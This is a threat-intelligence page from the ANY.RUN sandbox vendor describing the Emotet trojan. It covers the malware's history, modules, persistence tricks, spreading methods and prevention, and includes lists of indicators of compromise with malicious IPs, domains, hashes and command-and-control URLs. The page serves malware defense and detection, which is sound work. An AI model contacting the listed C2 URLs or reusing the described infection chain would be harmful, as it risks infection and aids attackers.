Black friday Up to 3 extra licenses FOR FREE + Special offer for TI LOOKUP Get it now
Webinar
February 26
Better SOC with Interactive Sandbox Practical Use Cases
Register now
1
Global rank
24 infographic chevron month
Month rank
26 infographic chevron week
Week rank
0
IOCs

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Trojan
Type
ex-USSR
Origin
1 June, 2014
First seen
26 September, 2025
Last seen
Also known as
Heodo
Geodo

How to analyze Emotet with ANY.RUN

Type
ex-USSR
Origin
1 June, 2014
First seen
26 September, 2025
Last seen

IOCs

IP addresses
50.125.99.70
92.207.145.74
50.100.215.149
37.120.175.15
87.248.77.159
185.97.32.6
54.39.181.130
24.206.17.102
179.52.236.96
208.180.149.228
200.56.104.44
216.176.21.143
216.251.1.1
118.244.214.210
181.229.155.11
86.98.71.86
67.43.253.189
120.150.206.156
189.130.50.85
159.65.76.245
Hashes
2472f67be97faab292b01380065132efde5a6ca6e45e9860354815b0f772e9ee
1733c93d2de0a3642530bba5d68ffc7917664292c67546f60c6e1c19009fd24e
5025c343e428cb58998b5c3ccf23b0988412b1ed94fd0a4f15bcb682cd427a85
47c7b499af43b155839c86421398797e892076505af45724e79f882f965331d0
458fb5d3f148799db9c26dd241f0622fd418d897a2e0b083363cf8eccb246dae
adccba943c9fcc276590b4bcac70bbb1b2beef34a664b0984eaae1aa79da4126
8534ed91bfc6b679b443a626cfb2f65ded34a0ea75721d4af206e114242e94ad
492471c24bf0db3d65d9ffc7fbdaad5887922bb3d203546300d01701c7d390b0
a31d3c0ecd13a5e12c031d04f458887c08237a58ad10684477879b5e5d97b78f
391dc9a44150d605ed034cd718f8a082fd6f9f8c7283926efbacd0a91c525b64
7e4f03153523e4ecf45962121ab53691578c258f417d5b6ce1a6b9e980874253
f0e287387fc065cc0115ba253887adda2dccc5a2478e4310b8d85082ca53d85f
f9312429c9ab5386aacdc9153191cb6e8312b4214d1b9e8371c9e5f48f9c2f73
8ebb84c2d0420a0cde024276c05712348208718e36c3e9aec1061a280c686935
b62bf929fef78ac09913dac2c1f13575b014658e2e043c730edfab291964a062
c197b89411fc7fe9f4d8412231f2b61ce573c908dbb5d7ff516efc72ba53c2aa
283ac4e417da802127c3bf5ae6428a35352b8fae19349f01350c3741827bf33b
a4a9ff30e2ce3f96540d77eab95b35bb005459552913741df2c4bbd85c90e2ac
2dbac4975c15d36a20557bd6599439a8dd9da8f9964e54a17d9aae64cd7be622
b0ea044782a0e808ff37b60f65102d1b5eb280413628039083edb168d9c17a5d
Domains
simplatecplc.com
bizercise.top
oilmotor.com.ua
proyectoin.com
ulukantasarim.com
woelf.in
sertecii.com
danisasellers.com
greatvacationgiveaways.com
zlc-aa.org
kids-education-support.com
cwbsa.org
uka.me
tagkarma.com
djkuhni.ru
dac-website.000webhostapp.com
vvk888.ru
easyneti.com
finnessemedia.com
coronadotx.com
URLs
http://162.241.242.173:8080/d97dhnk1Joy/ZOtXqb6B/zADA6/ygEOe594oTEgHZ4fmzU/
http://203.117.253.142/AG41L2Y78tmsZ1gjQQj/koRtBb4folCz9Dby6w/ILhWgBpLuOkrPqWWT/w4JiJ6kl/
http://209.141.54.221:8080/nUlV/
http://46.105.131.79:8080/VjUPEEfthrYI/UI3QSvE1imbFSE68M/fROfRFLt3HT465iheWM/
http://153.232.188.106/Tq02ofBHuVtKY/bE7aY3/KHPu/jHOpQq4/gW6u9gal8sJMB1Ub/dV2lhQ7MvHMmhM/
http://68.188.112.97/pNU01iszU0g/SI6713IQtJ/CSbnXMZt1nqfpHiArm/Ugv1adMgExRScs9tt/
http://45.55.219.163:443/F42Pnge2FlF/K1f3ewLeOdE9qo/
http://45.55.36.51:443/l4EtqoPkLXn/5MAQt/Nqll/6OSL1HEPO0M/
http://67.68.210.95/5Sib1/UsMb5Tn5Nsm1Tgt/GA0XfdIT/atrdDASSTOFZfwD/
http://173.73.87.96/s8kP2bPah/6YtFSQo5bonyq05/Mr6K8xYwaopfcuqhAST/G8UuRk58WX2FP/I9Ygp77CZwsxS9ac8G/wIuJSyGxGjw87Kvq/
http://173.73.87.96/96q5bKGAFONix/B6Bn02/EKYM/NPbSkjVcZy/
http://68.183.190.199:8080/pauauxOxFTc/fhLYUsmXA4oyMaCHSQ/TvJJptetaimuLV/WqbnOJDu2xFeGK/d5kl8WkH/nQp1aGg/
http://172.104.169.32:8080/7PT7hhx9heQ/HeH9dI42Ppn8e/
http://54.37.42.48:8080/9AAqGCMvwf5/lQNoa0AxEStSdjA/H3tm/93XensPM/nAm6J7XVOUg/0ALu/
http://38.88.126.202:8080/gHgktM6ery/
http://51.38.124.206/l5DWXxftw/DbqCAaE4dBrCx7/
http://185.215.227.107:443/85PAVEej/
http://45.55.36.51:443/w7Ayamt5SQFMOwJmDDj/4ZYO2QWj82Jnw/
http://45.55.36.51:443/pCyzicko6NasBnnuuXl/35HQBwD7CqS/
http://67.68.210.95/qqDxumeh7ryy68L/DeFMBQBNEB0I0/
Last Seen at

Recent blog posts

post image
ANY.RUN Sandbox & Microsoft Sentinel: Les...
watchers 361
comments 0
post image
Fighting Telecom Cyberattacks: Investigating...
watchers 1634
comments 0
post image
Efficient SOC: How to Detect and Solve Incide...
watchers 877
comments 0

What is Emotet Trojan?

Emotet is a highly sophisticated and destructive Trojan used to download and install other malware. First recorded in 2014, it was classified as a banking trojan, but Emotet has gained advanced capabilities throughout its lifetime and evolved into an entire malware distribution service.

So what makes the Emotet virus so dangerous? Based on the analysis, Emotet can act like a worm and spread using local networks, which makes it extremely hard to clean up. In addition to this, the trojan has advanced persistence and anti-evasion mechanics, such as detecting sandboxes and virtual machines with an option to generate false indicators to throw research off.

On top of that, the trojan has a polymorphic design – meaning that it can change its code to bypass signature-based detection, making this cyber defense strategy useless against its' attacks. Besides that, Emotet receives updates from the control server, performing this operation as if an operating system update is being installed. This allows the trojan to drop additional malware onto the infected machine stealthily.

It should also be noted that the Emotet trojan has a modular design which makes it possible to adapt this malware to various tasks and customize it for every particular campaign, giving the attackers maximum flexibility. Emotet's main targets are governments, corporations, small businesses, and individuals, focusing on Europe, America, and Canada.

General description of Emotet virus

The first version of Emotet malware which was spotted in the wild back in 2014, was designed to steal banking credentials by intercepting internet traffic and was much more basic than the beast of a Trojan which we know today. When Emotet was first spotted in the wild, the malware targeted mainly banks from Germany and Austria using only its native information stealing toolset.

Version two followed shortly after, this time carrying several additional modules such as a money transfer, mail spam, DDoS, and address book stealing modules. The third iteration of Emotet was released in 2015. This time attackers focused on upgrading the anti-evasion functionality of the malware and introducing banks from Switzerland into the list of potential victims.

The next overhaul of the Emotet malware followed in December 2016, changing the attack vector of the virus. At the beginning of its lifetime, Version 4 of the virus heavily relied on the RIG 4.0 exploit kit to make its way into the victims' computers, later switching primarily to mail spam. The same iteration of the malware also marked the moment when the primary use case of the malware started shifting from using its own banking module to dropping other Trojans onto infected machines.

Speaking of modules, Emotet malware can perform a large number of malicious activities that vary depending on the modules used in a particular campaign. Most versions of the virus included a spam module that can be used to continue the spread of the malware by sending out a series of malicious emails from the infected machine. Another typically included module is the one used for credential stealing, allowing Emotet to steal sensitive information from web browsers and mail clients.

In 2017, Emotet trojan was equipped with a spreader module, allowing the malware to infect all machines connected via a local network. The virus also gained the address book stealer module – this one is interesting. It analyzes the relationship between email senders and receivers and uses the collected information to enhance the effectiveness of subsequent campaigns originating from the users' PC, targeting friends, family members, and colleagues of the victim with personalized spam emails.

Not only does Emotet malware provide flexible functionality through the use of modules and has several anti-evasion functions, but it also puts a heavy emphasis on persistence. To ensure that the malware stays in the infected machine, it injects into running processes, downloads additional payloads, often targeting the Explorer.exe. In addition to that, the malware uses Scheduled Tasks and makes registry key changes.

Get started today for free

Analyze malware and phishing in a fully-interactive sandbox

Create free account

In January 2021, the Emotet botnet was taken down by law enforcement. The global effort, known as Operation Ladybird, located the malware infrastructure around the globe. They arrested at least two of the cybercriminal gang members in Ukraine. Their attackers' names were not uncovered.

Security experts teamed up and simultaneously hijacked hundreds of Emotet command-and-control servers and disrupted its backups, too. Researchers placed their own machines at the IP addresses of crooks' computers and made the payload inactive to prevent connection with the botnet.

These actions led to the fact that Emotet's C2 servers didn't work for almost ten months.

On November 14, 2021, Emotet came back with a new version. The botnet started to spread numerous maldocs. Moreover, it changed its tactics. The Emotet virus used to drop Trickbot or Qbot. But right now, the malware is also dealing with Cobalt Strike. It means that the time between the initial infection and a ransomware attack shortens significantly.

Also, researchers noticed that Emotet brings up more and more C2 servers to life. The botnet's new version acquired ECC encryption, modified communication protocols - ​​ new initial check-in, etc.

It should be noted that the mentioned Trojan versions are extremely destructive, and their attacks can have several consequences. For example, malware can cause loss of private data, inability to operate the infected PC up to its total disability, and financial losses associated with restoring the damaged infrastructure. In fact, one company was forced to spend an excess of one million dollars in order to deal with the aftermath of an Emotet attack.

Emotet malware analysis

A video recorded in the ANY.RUN malware hunting service, displays the execution process of Emotet, allowing to perform the analysis of the malware behavior in a lot of detail. You can also investigate other malware like FlawedAmmyy or Agent Tesla.

emotet execution process tree

Figure 1: Displays the processes list generated by the ANY.RUN malware hunting service

text report of the Emotet analysis

Figure 2: Even more information about the execution of Emotet can be found in customizable text reports generated by ANY.RUN

Emotet execution process

The Emotet trojan's primary distribution is through malicious email spam campaigns. The first step in the chain of infection involves tricking the potential victim into opening an attached Microsoft Office file using social engineering. After the file has been opened and macros enabled, there is no need for additional user actions.

Downloaded files contain malicious VBA code that runs after a document has been opened. One of the possible options of the infection process is when the VBA code utilizes WMI to launch a Powershell code which downloads the payload – a malicious executable file from the webserver. Notably, the Powershell script is encoded.

Emotet makes steps to maintain a presence in the infected system - it copies itself into %AppData% subfolders and changes the autorun value in the registry. Besides that, the malware allows its attackers to download additional payloads. The malware sends information to and from a server through all infection processes. As the last execution step, Emotet waits for commands from command-and-control servers.

Prevention of Emotet attacks

To minimize the risk of Emotet virus infection and potential destruction if such infection does occur, users are advised to follow a set of standard best practices, such as not downloading files from suspicious emails and keeping an updated version of antivirus on the machine at all times.

For organizations, it is advised to restrict inbound SMB communication between client systems to prevent Emotet from spreading from one machine to another within the local network, provide security training for personnel and instruct employees about the danger of mail spam as well as take all possible precautions to filter out potentially malicious emails at the firewall.

How does Emotet spread?

According to the analysis, the main distribution method of Emotet malware is malicious email campaigns. The trojan uses its address book stealer module in order to pull the contacts from the email account of its victim and send its payloads to the contacts found from the hijacked account.

Bearing in mind that potential victims are receiving an email from somebody they know and trust, Emotet has a very high chance of a successful attack. The received email usually contains a link to a malicious URL that downloads the malware and launches the payload when clicked.

However, email spam is not the only distribution Method that this malware utilizes. It may also take advantage of certain Windows vulnerabilities, thus the malware can make its way into a machine completely "silently," without the user ever knowing about it.

How to collect Emotet's IOCs using ANY.RUN?

For your detailed Emotet malware analysis ANY. RUN's "Fake Net" feature will be very useful. It intercepts HTTP requests and returns a 404 error, forcing malware to reveal its command-and-control server links.

fake net emotet Figure 3: Run Emotet sample with turn on "Fake net" feature

To turn it on in the "Advanced mode" of the "New task" window, check the box next to the "Fake net" in the "Network" section.

Use ANY.RUN free for 14 days

Try the full power of interactive analysis

Start your free trial

Conclusion

Emotet malware is one of the most sophisticated and destructive trojans. Since its first introduction back in 2014, the malware has underground a substantial evolution gaining a lot of anti-evasion features, obtaining worm-like functionality, and even changing the main focus from information-stealing to installing other trojans onto infected machines. With the ability to spread to adjacent systems, Emotet can easily infect all machines in a single network, making dealing with the consequences of an attack a true nightmare.

The situation is further worsened by the fact that the malware is equipped with a series of anti-evasion tricks that make analyzing it quite tricky. As a result, the process of developing countermeasures is much more complicated in comparison to more straightforward trojans.

Thankfully, modern online hunting services like ANY.RUN are equipped with equally advanced research functions and allow professionals to study cyber threats with maximum efficiency, helping researchers battle evasive malware like Emotet.

Create your free ANY.RUN account to analyze malware and phishing without limits!

HAVE A LOOK AT

Godfather screenshot
Godfather
godfather
The Godfather malware is an Android banking Trojan capable of bypassing MFA that targets mobile banking and cryptocurrency applications. Known for its ability to evade detection and mimic legitimate software, it poses a significant threat to individuals and organizations by stealing sensitive data and enabling financial fraud.
Read More
Botnet screenshot
Botnet
botnet
A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.
Read More
EvilProxy screenshot
EvilProxy
evilproxy
EvilProxy is a phishing-as-a-service (PhaaS) platform that enables cybercriminals to bypass multi-factor authentication (MFA) and hijack user sessions. It leverages reverse proxy techniques to harvest credentials and session cookies, posing a serious threat to both individuals and enterprises.
Read More
Sliver screenshot
Sliver
sliver
Sliver is an open-source command-and-control (C2) framework that has been increasingly adopted by threat actors as an alternative to tools like Cobalt Strike. Developed by security firm Bishop Fox, Sliver was initially intended for legitimate security testing and red teaming exercises. However, its robust features and open-source nature have made it attractive to malicious actors seeking to control compromised systems.
Read More
Grandoreiro screenshot
Grandoreiro
grandoreiro
Grandoreiro is a Latin American banking trojan first observed in 2016. It targets mostly Spanish-speaking countries, such as Brazil, Spain, Mexico and Peru. This malware is operated as a Malware-as-a-Service (MaaS), which makes it easily accessible for cybercriminals. Besides, it uses advanced techniques to evade detection.
Read More
Havoc screenshot
Havoc
havoc
Havoc is an advanced post-exploitation framework used by hackers to take control of a system once they've breached it. With Havoc, attackers can run commands remotely, inject malicious processes, and access sensitive data. It's often used in targeted attacks, allowing cybercriminals to stay hidden in a network while stealing information or launching further attacks. Its flexibility and ability to bypass detection make it a serious threat, especially in environments that rely on traditional security tools.
Read More